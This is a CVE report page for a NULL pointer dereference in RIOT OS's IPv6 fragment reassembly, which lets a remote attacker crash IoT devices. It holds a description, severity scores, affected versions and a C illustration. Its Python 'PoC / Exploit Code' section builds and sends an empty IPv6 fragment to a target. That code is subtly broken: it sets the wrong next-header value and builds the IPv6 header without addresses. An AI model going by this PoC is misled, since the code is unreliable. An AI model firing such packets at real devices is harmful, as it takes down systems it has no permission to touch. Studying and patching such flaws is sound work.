Security Vulnerability Report
CVE-2025-66646 CVSS 7.5 HIGH

CVE-2025-66646

Published: 2025-12-17 20:15:56
Last Modified: 2026-01-22 16:22:00

Description

RIOT is an open-source microcontroller operating system, designed to match the requirements of Internet of Things (IoT) devices and other embedded devices. A vulnerability was discovered in the IPv6 fragmentation reassembly implementation of RIOT OS v2025.07. When receiving a fragmented IPv6 packet with fragment offset 0 and an empty payload, the payload pointer is set to NULL. However, the implementation still tries to copy the payload into the reassembly buffer, resulting in a NULL pointer dereference that crashes the OS (DoS). To trigger the vulnerability, the `gnrc_ipv6_ext_frag` module must be enabled and the attacker must be able to send arbitrary IPv6 packets to the victim. RIOT OS v2025.10 fixes the issue.
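As an added illustration (not RIOT's code), a simplified C model of the two steps the advisory describes: a Fragment-header parser that yields a NULL payload pointer for an empty fragment, and a reassembly-buffer insert that rejects it before copying rather than dereferencing it. Function names, the buffer layout and the constructed packet are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Simplified model (not RIOT's code) of the two steps the advisory describes:
 * locating the fragment data and copying it into the reassembly buffer. */
#define IPV6_HDR_LEN 40
#define FRAG_HDR_LEN 8
#define PROTNUM_FRAG 44   /* next-header value of the IPv6 Fragment header */
#define RBUF_SIZE    1280
typedef struct { uint8_t data[RBUF_SIZE]; size_t received; } rbuf_t;

/* Returns the fragment's data length (0 when empty) or -1 if malformed. For an
 * empty fragment *data becomes NULL, the condition the advisory names. */
int frag_parse(const uint8_t *pkt, size_t len, uint16_t *offset, const uint8_t **data)
{
    if (len < IPV6_HDR_LEN + FRAG_HDR_LEN || pkt[6] != PROTNUM_FRAG) return -1;
    const uint8_t *fh = pkt + IPV6_HDR_LEN;
    uint16_t off_res_m = (uint16_t)((fh[2] << 8) | fh[3]);   /* offset:13 | res:2 | M:1 */
    *offset = (uint16_t)((off_res_m >> 3) * 8);              /* offset is in 8-octet units */
    size_t dlen = len - IPV6_HDR_LEN - FRAG_HDR_LEN;
    *data = (dlen == 0) ? NULL : fh + FRAG_HDR_LEN;
    return (int)dlen;
}

/* Hardened copy: reject an empty fragment and bounds-check before memcpy,
 * instead of dereferencing the NULL payload pointer. Returns 0 or -1. */
int rbuf_add(rbuf_t *rb, uint16_t offset, const uint8_t *data, size_t dlen)
{
    if (data == NULL || dlen == 0) return -1;
    if (offset > RBUF_SIZE || dlen > RBUF_SIZE - offset) return -1;
    memcpy(rb->data + offset, data, dlen);
    rb->received += dlen;
    return 0;
}

/* Builds a constructed packet (IPv6 + Fragment header, offset 0, M=0, `dlen` filler
 * bytes), parses it and feeds the buffer; returns rbuf_add's result, so dlen == 0
 * reproduces the advisory's empty fragment. */
int handle_fragment(size_t dlen)
{
    uint8_t pkt[IPV6_HDR_LEN + FRAG_HDR_LEN + 64] = {0};
    if (dlen > 64) return -1;
    pkt[0] = 0x60; pkt[5] = (uint8_t)(FRAG_HDR_LEN + dlen);  /* version 6, payload length */
    pkt[6] = PROTNUM_FRAG; pkt[7] = 64;                       /* next header, hop limit */
    pkt[IPV6_HDR_LEN] = 59;                                   /* frag next header: none */
    memset(pkt + IPV6_HDR_LEN + FRAG_HDR_LEN, 0xAB, dlen);    /* constructed payload */
    uint16_t offset = 0; const uint8_t *data = NULL; rbuf_t rb = {0};
    int n = frag_parse(pkt, IPV6_HDR_LEN + FRAG_HDR_LEN + dlen, &offset, &data);
    return (n < 0) ? -1 : rbuf_add(&rb, offset, data, (size_t)n);
}
```

The empty fragment is rejected by the length check before any copy takes place, which is the behaviour the fix in v2025.10 restores; a fragment carrying data is copied normally.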

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:riot-os:riot:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:riot-os:riot:2025.10:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:riot-os:riot:2025.10:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:riot-os:riot:2025.10:rc3:*:*:*:*:*:* - VULNERABLE
RIOT OS v2025.07

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import struct


def create_ipv6_fragment_packet(offset=0, payload=b'', more_fragments=0):
    """
    PoC for CVE-2025-66646: NULL pointer dereference in RIOT OS IPv6
    fragmentation reassembly.

    This PoC creates a malicious IPv6 fragment packet that triggers the
    vulnerability:
    - Fragment offset: 0 (first fragment)
    - Payload: Empty (triggers NULL pointer assignment)
    - More fragments flag: 0 (last fragment)
    """
    # IPv6 Fragment Header format:
    # +-------------+-------------+-------------------------+
    # | Next Header |  Reserved   | Fragment Offset |Res| M |
    # +-------------+-------------+-------------------------+
    # |               Identification (32-bit)               |
    # +-----------------------------------------------------+
    next_header = 0x06  # TCP (example)
    reserved = 0x00
    # Fragment offset (13 bits) | Reserved (2 bits) | M flag (1 bit)
    # offset=0, reserved=0, more_fragments=0
    fragment_offset = (offset << 3) | (reserved << 1) | more_fragments
    identification = 0x12345678  # Arbitrary identifier
    fragment_header = struct.pack('!BBHI', next_header, reserved,
                                  fragment_offset, identification)
    # Add empty payload to trigger NULL pointer dereference
    return fragment_header + payload


def send_malicious_packet(target_ip):
    """
    Send the crafted packet to trigger CVE-2025-66646
    Note: Requires raw socket privileges and IPv6 network access
    """
    import socket
    # Create IPv6 raw socket
    sock = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)
    # IPv6 base header
    version_class_flow = 0x60000000
    payload_length = len(create_ipv6_fragment_packet(0, b'', 0))
    next_header = 0x3A  # IPv6-Frag
    hop_limit = 64
    src_ip = "2001:db8::1"
    dst_ip = target_ip
    ipv6_header = struct.pack('!I BBH BB', version_class_flow, payload_length,
                              next_header, hop_limit, 0, 0)
    # Source/dest addresses would be extended
    # Craft malicious fragment
    fragment = create_ipv6_fragment_packet(offset=0, payload=b'', more_fragments=0)
    # Full packet
    packet = ipv6_header + fragment
    # Send packet
    sock.sendto(packet, (dst_ip, 0))
    sock.close()


if __name__ == "__main__":
    print("CVE-2025-66646 PoC - RIOT OS IPv6 Fragmentation NULL Pointer Dereference")
    print("Usage: Run with root privileges and specify target IPv6 address")
```

Weakness

CWE-476 (NULL Pointer Dereference)

CVSS 4.0 (secondary metric)
1.7 LOW
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Affected versions: all releases before 2025.10, plus 2025.10 rc1, rc2 and rc3.

References

https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L411
https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L420
https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L490
https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L532
https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L534
https://github.com/RIOT-O ... (truncated)